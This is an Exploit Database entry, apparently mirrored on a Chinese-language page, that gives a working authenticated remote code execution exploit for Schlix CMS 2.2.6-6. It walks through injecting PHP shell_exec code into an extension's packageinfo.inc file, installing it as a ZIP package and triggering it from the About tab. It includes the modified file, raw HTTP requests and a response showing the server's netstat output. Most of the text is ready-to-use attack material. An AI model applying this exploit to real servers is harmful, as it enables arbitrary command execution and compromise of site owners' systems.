Schlix CMS 2.2.6-6 – Remote Code Execution (Authenticated)

• Exploit Database
• 15 阅读

• 作者： Eren Saraç
  日期： 2021-05-06
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49838/

• # Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
  # Date: 2021-05-06
  # Exploit Author: Eren Saraç
  # Vendor Homepage: https://www.schlix.com/
  # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
  # Version: 2.2.6-6
  # Tested on: Windows & WampServer
  
  ==> Tutorial <==
  
  1- Login with your account.
  2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
  3- Create a new category.
  4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
  5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
  6- Paste this PHP code below and save it.
  #####################################
  $command = shell_exec('netstat -an');
  echo "<pre>$command</pre>";
  
  ?>
  #####################################
  
  7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
  8- Install a package to created category and enter the installed 'mailchimp' extension.
  9- Click the 'About' tab and our php code will be executed.
  
  ==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==
  
  <?php
  
  $name = 'mailchimp';
  $type = 'block';
  $guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
  $version = '1.0';
  $license = 'MIT';
  $description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
  $author = 'Alip';
  $url = 'https://github.com/calip/app_mailchimp';
  $email = 'asalip.putra@gmail.com';
  $copyright = 'Copyright &copy;2019 calip';
  $command = shell_exec('netstat -an');
  echo "<pre>$command</pre>";
  
  ?>
  
  ==> HTTP Request (ZIP Extension Installation) <==
  
  POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
  Host: (HOST)
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
  Accept: */*
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  X-Schlix-Ajax: 1
  Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
  Content-Length: 51585
  Origin: http(s)://(ORIGIN)
  Connection: close
  Referer: http(s)://(REFERER)/admin/app/core.blockmanager
  Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; 
  schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
  
  -----------------------------29322337091578227221515354130
  Content-Disposition: form-data; name="_csrftoken"
  
  a3b9a0da8d6be08513f60d1744e2642df0702ff7
  -----------------------------29322337091578227221515354130
  Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
  Content-Type: application/x-zip-compressed
  
  #############################################
  #############################################
  #############################################
  #############################################
  #############################################
  #############################################
  #############################################
  #############################################
  #############################################
  #############################################
  
  -----------------------------29322337091578227221515354130
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  2097152
  -----------------------------29322337091578227221515354130
  Content-Disposition: form-data; name="zipfileupload__total_file_size"
  
  0
  -----------------------------29322337091578227221515354130
  Content-Disposition: form-data; name="zipfileupload__max_file_count"
  
  20
  -----------------------------29322337091578227221515354130
  Content-Disposition: form-data; name="password"
  
  # Your ACC Password.
  -----------------------------29322337091578227221515354130--
  
  
  ==> HTTP Request (RCE - About Tab) <==
  
  GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
  Host: (HOST)
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Referer: http(s)://(HOST)/
  Connection: close
  Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; 
  schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
  Upgrade-Insecure-Requests: 1
  
  
  ==> HTTP Response (RCE - About Tab) <==
  
  HTTP/1.1 200 OK
  Date: Wed, 05 May 2021 21:49:24 GMT
  Server: Apache/2.4.46 (Win64) PHP/7.3.21
  X-Powered-By: PHP/7.3.21
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 49575
  
  <!DOCTYPE html>
  <html>
  <body>
  <div id="tab_options" class="schlixui-childtab">
  <pre>
  Active Connections
  
  ProtoLocal AddressForeign AddressState
  TCP0.0.0.0:80 0.0.0.0:0LISTENING
  TCP0.0.0.0:1350.0.0.0:0LISTENING
  TCP0.0.0.0:4450.0.0.0:0LISTENING
  TCP0.0.0.0:9020.0.0.0:0LISTENING
  TCP0.0.0.0:9120.0.0.0:0LISTENING
  TCP0.0.0.0:3306 0.0.0.0:0LISTENING
  TCP0.0.0.0:3307 0.0.0.0:0LISTENING
  TCP0.0.0.0:5040 0.0.0.0:0LISTENING
  TCP0.0.0.0:7680 0.0.0.0:0LISTENING
  TCP0.0.0.0:496640.0.0.0:0LISTENING
  TCP0.0.0.0:496650.0.0.0:0LISTENING
  TCP0.0.0.0:496660.0.0.0:0LISTENING
  TCP0.0.0.0:496670.0.0.0:0LISTENING
  TCP0.0.0.0:496680.0.0.0:0LISTENING
  TCP0.0.0.0:502960.0.0.0:0LISTENING
  TCP127.0.0.1:80 127.0.0.1:58843TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58853TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58854TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58859TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58860TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58865TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58868TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58883TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58893TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58894TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58899TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58902TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58908TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58918TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58919TIME_WAIT
  TCP127.0.0.1:80 127.0.0.1:58924TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58886TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58887TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58888TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58891TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58905CLOSE_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58907TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58911TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58913TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58915TIME_WAIT
  TCP127.0.0.1:8080 127.0.0.1:58916TIME_WAIT
  TCP127.0.0.1:58424127.0.0.1:58425ESTABLISHED
  TCP127.0.0.1:58425127.0.0.1:58424ESTABLISHED
  TCP127.0.0.1:58435127.0.0.1:58436ESTABLISHED
  TCP127.0.0.1:58436127.0.0.1:58435ESTABLISHED
  TCP127.0.0.1:58565127.0.0.1:58566ESTABLISHED
  TCP127.0.0.1:58566127.0.0.1:58565ESTABLISHED
  TCP127.0.0.1:58639127.0.0.1:58640ESTABLISHED
  TCP127.0.0.1:58640127.0.0.1:58639ESTABLISHED
  TCP169.254.22.167:139 0.0.0.0:0LISTENING
  TCP169.254.224.26:139 0.0.0.0:0LISTENING
  TCP192.168.1.8:1390.0.0.0:0LISTENING
  TCP192.168.1.8:4950095.101.14.77:443 ESTABLISHED
  TCP192.168.1.8:57059162.159.129.235:443ESTABLISHED
  TCP192.168.1.8:57902162.159.138.234:443ESTABLISHED
  TCP192.168.1.8:5845344.235.189.138:443 ESTABLISHED
  TCP192.168.1.8:58626162.159.138.232:443ESTABLISHED
  TCP192.168.1.8:58627162.159.133.234:443ESTABLISHED
  TCP192.168.1.8:58699162.159.135.232:443ESTABLISHED
  TCP192.168.1.8:5884120.44.232.74:443 ESTABLISHED
  TCP192.168.1.8:58942162.159.138.232:443ESTABLISHED
  TCP192.168.1.8:58951138.68.92.190:443ESTABLISHED
  TCP192.168.1.8:6054951.103.5.159:443 ESTABLISHED
  TCP192.168.1.8:60610104.66.70.197:443ESTABLISHED
  TCP192.168.1.8:60611104.66.70.197:443ESTABLISHED
  TCP192.168.1.8:60612217.31.233.104:443 CLOSE_WAIT
  TCP[::]:80[::]:0 LISTENING
  TCP[::]:135 [::]:0 LISTENING
  TCP[::]:445 [::]:0 LISTENING
  TCP[::]:3306[::]:0 LISTENING
  TCP[::]:3307[::]:0 LISTENING
  TCP[::]:7680[::]:0 LISTENING
  TCP[::]:49664 [::]:0 LISTENING
  TCP[::]:49665 [::]:0 LISTENING
  TCP[::]:49666 [::]:0 LISTENING
  TCP[::]:49667 [::]:0 LISTENING
  TCP[::]:49668 [::]:0 LISTENING
  TCP[::]:50296 [::]:0 LISTENING
  TCP[::1]:3306 [::1]:58845TIME_WAIT
  TCP[::1]:3306 [::1]:58856TIME_WAIT
  TCP[::1]:3306 [::1]:58857TIME_WAIT
  TCP[::1]:3306 [::1]:58858TIME_WAIT
  TCP[::1]:3306 [::1]:58932TIME_WAIT
  TCP[::1]:3306 [::1]:58935TIME_WAIT
  TCP[::1]:3306 [::1]:58940TIME_WAIT
  TCP[::1]:3306 [::1]:58950TIME_WAIT
  TCP[::1]:3306 [::1]:58953ESTABLISHED
  TCP[::1]:3306 [::1]:58954ESTABLISHED
  TCP[::1]:49485[::1]:49486ESTABLISHED
  TCP[::1]:49486[::1]:49485ESTABLISHED
  TCP[::1]:49669[::]:0 LISTENING
  TCP[::1]:58844[::1]:3306 TIME_WAIT
  TCP[::1]:58845[::1]:3306 TIME_WAIT
  TCP[::1]:58855[::1]:3306 TIME_WAIT
  TCP[::1]:58856[::1]:3306 TIME_WAIT
  TCP[::1]:58857[::1]:3306 TIME_WAIT
  TCP[::1]:58858[::1]:3306 TIME_WAIT
  TCP[::1]:58861[::1]:3306 TIME_WAIT
  TCP[::1]:58862[::1]:3306 TIME_WAIT
  TCP[::1]:58863[::1]:3306 TIME_WAIT
  TCP[::1]:58864[::1]:3306 TIME_WAIT
  TCP[::1]:58866[::1]:3306 TIME_WAIT
  TCP[::1]:58867[::1]:3306 TIME_WAIT
  TCP[::1]:58869[::1]:3306 TIME_WAIT
  TCP[::1]:58870[::1]:3306 TIME_WAIT
  TCP[::1]:58884[::1]:3306 TIME_WAIT
  TCP[::1]:58885[::1]:3306 TIME_WAIT
  TCP[::1]:58929[::1]:3306 TIME_WAIT
  TCP[::1]:58930[::1]:3306 TIME_WAIT
  TCP[::1]:58931[::1]:3306 TIME_WAIT
  TCP[::1]:58932[::1]:3306 TIME_WAIT
  TCP[::1]:58934[::1]:3306 TIME_WAIT
  TCP[::1]:58935[::1]:3306 TIME_WAIT
  TCP[::1]:58939[::1]:3306 TIME_WAIT
  TCP[::1]:58940[::1]:3306 TIME_WAIT
  TCP[::1]:58946[::1]:3306 TIME_WAIT
  TCP[::1]:58947[::1]:3306 TIME_WAIT
  TCP[::1]:58949[::1]:3306 TIME_WAIT
  TCP[::1]:58950[::1]:3306 TIME_WAIT
  TCP[::1]:58953[::1]:3306 ESTABLISHED
  TCP[::1]:58954[::1]:3306 ESTABLISHED
  UDP0.0.0.0:5050 *:*
  UDP0.0.0.0:5353 *:*
  UDP0.0.0.0:5355 *:*
  UDP0.0.0.0:53240*:*
  UDP0.0.0.0:53241*:*
  UDP127.0.0.1:1900 *:*
  UDP127.0.0.1:62353*:*
  UDP127.0.0.1:63129*:*
  UDP192.168.1.8:137*:*
  UDP192.168.1.8:138*:*
  UDP192.168.1.8:1900 *:*
  UDP192.168.1.8:2177 *:*
  UDP192.168.1.8:63128*:*
  UDP[::]:5353*:*
  UDP[::]:5355*:*
  UDP[::1]:1900 *:*
  UDP[::1]:63125*:*
  UDP[fe80::e4d5:62f5:da3:2dae%21]:1900*:*
  UDP[fe80::e4d5:62f5:da3:2dae%21]:2177*:*
  UDP[fe80::e4d5:62f5:da3:2dae%21]:63124*:*
  </pre>
  <div class="content">
  <div class="row">
  <div class="col-xs-12">
  <div class="text-center">
  <h1>mailchimp</h1>
  <p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p> 
  <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> 
  <p><a href="https://www.exploit-db.com/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
  </div>
   </div> 
  </div>
  </div>
  </div>
  </body>